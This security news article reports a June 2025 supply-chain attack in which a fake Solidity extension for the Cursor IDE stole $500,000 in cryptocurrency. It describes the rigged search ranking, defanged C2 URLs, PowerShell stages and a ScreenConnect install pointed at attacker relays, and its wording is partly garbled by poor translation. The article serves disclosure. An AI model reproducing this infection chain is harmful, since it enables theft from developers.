The sophisticated cybercriminal manipulation has stolen $500,000 in cryptocurrency assets from Russian blockchain developers through a malicious extension targeting the Cursor AI integrated development environment.
The attack, which took place in June 2025, expresses concerns about the evolution of supply chain attacks that take advantage of the growing popularity of AI-assisted development tools.
The incident began when a victim, a security-oriented developer who recently installed a fresh operating system, searched for Solidity Syntax, which highlights the extension within the cursor AI IDE.
Despite using online malware detection services and maintaining strict security practices, developers inadvertently installed malicious packages disguised as legitimate development tools.
A fake extension published under the name “Solidity Language” had accumulated 54,000 downloads before being detected and removed.
What makes this attack particularly insidious is the use of search ranking algorithms to place malicious extensions on legitimate alternatives.
.webp)
The attacker utilized the open VSX registry relevance-based ranking system. This takes into account factors such as updates up-to-dateness, number of downloads, and ratings.
By releasing the malicious extension on the recent update date of June 15, 2025, cybercriminals manipulate packages to show up at number 4 in search results, and Authentic Extension ranked 8th, compared to the May 30, 2025 update of legitimate extensions.
SecureList analysts identified the malware after conducting forensic analysis of victim compromise systems.
Investigations reveal that malicious extensions do not highlight the actual syntax, and instead act as a drip agent for the multi-stage attack chain.
Infected chain
The malware infection mechanism demonstrates a sophisticated understanding of both social engineering and technology avoidance techniques.
%20and%20legitimate%20(green)%20extensions%20(Source%20-%20Securelist).webp)
When you install it, you will see a malicious extension file in %userprofile%\.cursor\extensions\solidityai.solidity-1.0.9-universal\src\extension.jsimmediately began contacting the command and control server. angelic[.]su.
The first PowerShell script retrieved from https://angelic[.]su/files/1.txt We have confirmed that the victim's machine has Screen Connect Remote Management Software.
If screenconnect was not detected, the malware downloaded a secondary script from https://angelic[.]su/files/2.txtthen I got the ScreenConnect installer from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi.
This legitimate remote access tool was configured to communicate with the attacker's infrastructure. relay.lmfao[.]suproviding permanent access to compromised systems.
The use of legitimate management tools represents the common tactics employed by sophisticated persistent threat actors to combine malicious activities with normal system operations.
The attack infrastructure reveals well-organized operations that have been extended beyond this single incident.
Researchers have discovered related malicious packages that include “solsafe” in the NPM repository, as well as three additional visual studio code extensions.
Investigate live malware behavior, track every step of the attack, and make faster, smarter security decisions -> Try any.run now
